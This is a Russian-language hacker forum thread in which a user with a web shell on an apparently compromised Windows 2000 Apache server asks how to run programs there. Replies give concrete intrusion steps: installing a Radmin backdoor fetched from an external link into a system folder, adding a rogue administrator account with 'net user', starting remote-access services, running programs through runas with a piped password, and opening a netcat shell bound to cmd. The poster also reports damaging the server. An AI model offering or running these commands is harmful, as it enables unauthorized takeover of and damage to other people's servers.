![]() |
Удаленный запуск exe/bat
- Есть доступ к компу (не локалхост)
- Могу загружать (шелл...)/скачивать/удалять с сервера без ограничений - Win NT - Apache Как мне запустить на этом сервере какой-нибудь exe/bat файл? - Не помешает ли то, что тачка залагофена? |
если в шелле есть поле для команд, просто вводишь имя исполняемого файла (полный путь)
|
залагофена? это что -- микроб новый или болезьн какая----- пифлит правильно сказал закачай шелл и через него
|
На локалхосте ехешка открывается - там нет.
Еще пробовал "start Full_Patch" - у меня пашет - там нет. В чем м/б дело? |
Цитата:
1. "Залогофена" - Log Off - Пользователь не авторизовался в системе. Не влияет на выполнение программ из веб шелла. 2. Читай внимательно начало темы. Шелл уже залит. Теперь по сабжу. Топикстартер, самый простой вариант, почему у тебя не выполняються комманды системы (в том числе и на исполнение файлов) это так назаваемый Safe Mode режим работы Apache сервера. Прежде чем выполнять exe или bat, попробуй выполнить комманду tasklist. Если оны выполниться, а программы - нет, то дело, скорее всего в дополнительной защите сервера. Впрочем это довольно большая редкость (доп.защита). |
safe_mode: OFF
tasklist не выполняется. Еще можно что-то попробовать? |
PHP version: 5.2.1
Disable functions : NONE Windows NT 5.0 build 2195 При запуске (попытке) ехе или батника - ошибок не пишет и не ошибок тоже - просто начинает выполняться страница (загрузка) и продолжает это в течении 10 минут, потом я насильно перезахожу в шелл. |
Цитата:
|
Рассказываю....
Значит так... 1) качаешь http://limpompo.nm.ru/radmin_install.rar 2) Заходишь на свой шелл... Меняешь диру на C:\windows\system32\spool 3) Создаёшь папочку Командой mkdir setup - потом заходишь в неё 4) Разархивируй Архив (Увидишь 4 файла) 5) Заливай по одному на Дедик 6) Запускай install.bat 7) Установи у себя Клиета Radmin 8) Коннектишься к Radmin server-у на порт 5454 9) ВВодишь пароль vasea_123 10) Ура... Можно и пивка выпить.... |
Цитата:
Цитата:
Цитата:
Подскажи только как сделать (6) пункт? Цитата:
|
Цитата:
C:\windows\system32\spool\setup\install.bat И всё =) |
Ты проблему темы читал?
|
Hana
Попробуй через твой шелл замутить дополнительного юзверя Код:
net user vasia 123 /addКод:
net userесли приконектится вводи логин vasia пароль 123 и всё......если получится то ты увидишь рабочий стол сервака! //ЗЫ: немнога поздновато конечно....но ниче.....может другим пригодится =0) |
Никогда не поздно =)
Юзера добавил, правда не так просто... Привилегии админа. Но через рдп не лезет - пишет, что не удается подключиться... Это значит сервис выключен или можно еще что-то попробовать (логин и пасс точно правильные)? |
И заодно: как включается этот самый удаленный рабочий стол? Желательно чтобы слова можно было переделать в автоматизм (прогу напишу сам). Вопрос не для данного случая, но тоже нужен ;)
|
попробуй стартануть сервис
Код:
net start REMOTEACCESSКод:
echo (твой_пароль) | runas /env /noprofile /user:(твой_юзер) install.exe |
Цитата:
Цитата:
Написал консольку типа РанАс. Она запускается через шелл, и выдает мой текст "Все ок". Т.е. вроде должно запустится приложение. Написал еще одну прогу: при запуске конектиться на мой комп и через 5 сек выходит. Запускал и с своим РанАсом, и просто "напрямую" из шелла: ко мне никто так и не приконнектился. Этим же РанАсом удалил несколько папок (самопальных), которые не мог удалить чрез шелл командой rmdir (т.е. проги я могу запускать, но в нэт их кто-то не пускает). Думал проблема с ИПишкой сервака - но скорее всего ошибся, так как ко мне, повторюсь, этот самый сервак не приконнектился (у меня ИП норм). Что еще можно попробовать? Немного запортил сервак. 1) что я мог сделать, что теперь апачь в логах пишет только один ИП: 0.0.0.0? 2) если я перезагружу комп - апачь стартанется без ЛогИна? 3) при "прямых запусках" программ черех шелл, шеллы виснут, т.е. немогу зайти повторно и удалить их с сервака. Так должно быть или...? |
P.s. пробовал запускать радмина и свой собственный "ДУ стол".
|
Цитата:
фаер не обязательно должен стоять именно на этой машине, он может быть и на другой через которую проходит весь трафик, а может там и рутер стоит ;).....выведи команду Код:
netstat -anoКод:
nc.exe или netcat.exe -l -p ( прослушивающийся порт ) -d -e cmdЦитата:
2) по идее должен без логина ( автоматичесkи ) - это же сервис 3) если прога требует пароль из консоли то это логично, а может ещё из за графического интерфэйса oO //PS: "ДУ стол" - эта чё? |
Hana, если есть доступ к командной строке, заходишь в папку с файлом (с помощью комманд cd =)) и просто пишешь start file.bat или start file.exe должно работать
|
Hana сделай инжект VNC-сервера. Как сделать смотри тут: https://forum.antichat.ru/thread38434.html
Как включить Remote Desktop глянь тут: https://forum.antichat.ru/thread36042.html |
Цитата:
Цитата:
Цитата:
Цитата:
-=lebed=- Сэнкс, попробую. |
через телнет соединится и написать
Код:
start C:\e.exe |
А через телнет как? Да и вообще проги то я уже запустил, проблема теперь с нэтом - не конектит и все (т.е. установка радмина ничего не дает).
|
| Время: 21:08 |